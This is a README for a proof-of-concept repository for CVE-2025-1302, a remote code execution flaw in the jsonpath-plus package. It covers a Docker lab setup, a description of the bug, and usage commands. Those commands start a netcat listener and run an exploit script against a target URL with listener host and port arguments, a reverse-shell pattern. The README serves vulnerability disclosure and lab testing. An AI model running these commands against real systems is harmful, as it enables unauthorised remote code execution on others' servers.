# CVE-2025-1302
★ CVE-2025-1302 JSONPath-plus RCE PoC ★



https://github.com/user-attachments/assets/5d791540-ef6c-4cd0-bd25-7a1dbbd194fb




## Lab Setup
```sh
docker build -t jsonpath:10.2.0 .
docker run --rm --name jsonpath -p 3000:3000 jsonpath:10.2.0
```

**localhost:3000**
![image](https://github.com/user-attachments/assets/aead0bec-d46b-4896-b147-0c087fcb6e77)


## Description
Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. **Note:** This is caused by an incomplete fix for [CVE-2024-21534](https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-7945884).

## How to use
### Git clone
```sh
git clone https://github.com/EQSTLab/CVE-2025-1302.git
cd CVE-2025-1302
```
### Install packages
```sh
pip install -r requirements.txt
```
### Command
```sh
nc -l -p <LPORT>
python3 CVE-2025-1302.py -u <URL_TO_EXPLOIT> -i <LHOST> -p <LPORT>
```

### Output
![image](https://github.com/user-attachments/assets/c8989ea6-841f-4904-a688-53dc4d0cf439)

### Result
![image](https://github.com/user-attachments/assets/f5c8dc25-9b0d-4aab-818f-79190a030a8e)

# Disclaimer
This repository is not intended to be RCE exploit to CVE-2025-1302. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications.

# EQST Insight
We publish CVE and malware analysis once a month. If you're interested, please follow the links below to check out our publications.
https://www.skshieldus.com/eng/business/insight.do
